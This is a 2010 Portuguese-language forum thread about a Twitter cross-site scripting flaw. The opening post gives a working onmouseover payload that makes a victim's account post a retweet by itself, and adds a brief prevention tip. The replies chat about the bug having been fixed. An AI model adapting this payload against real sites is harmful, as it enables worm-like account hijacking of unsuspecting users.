xss on twitter

Iniciado por zombie, 21 de Setembro , 2010, 11:11:05 AM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

Imprimir
Ir para o fim Páginas1
Ações

zombie

21 de Setembro , 2010, 11:11:05 AM
Falha no twtter permite execucoes de scripts xss:

twitta esse codigo:
http://t.co/@"onmouseover="document.getElementById('status').value='RT jessyi7′;$('.status-update-form').submit();"class="modal-overlay"/
apos o usuario passa o mouse em cima do codigo ele e executado ..
Prevencao:
Na utulizacao de um cliente tipo tweetdeck, o script nao e executado...

n0mor3

#1
21 de Setembro , 2010, 03:08:31 PM
Puts, é engano meu ou começou a ser descoberto os bugs do twitter?
voce quem descobriu esse xss, zombie ?
agora é tenso ficar usando o tweetdeck...

valeu o toque, []'s

zombie

#2
21 de Setembro , 2010, 04:32:14 PM
fala fpois0n bele..
nao nao.. nao fui eu que descobri a falha... so tava no twitter na hora do teste^^
faz tempo que parrei com estudos e "testes"^^  da area. Mas estou pretendendo voltar!

E sobre o twtter.. cada dia sai um  exploit novo pra ele.. mas o pessoal la ta antenado!!
JA ARRUMARAM PARA ESSA FUL..

Reeves

#3
22 de Setembro , 2010, 12:21:31 PM
Incrivel como o twitter consegue sofrer meses uma falha tão idiota como XSS! ;)
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

zombie

#4
22 de Setembro , 2010, 07:43:44 PM
Fala Reeves master servers ... haushsauhausah
sao "tudo" uns cabaco pelo jeito...
Imprimir
Ir para o topo Páginas1
Ações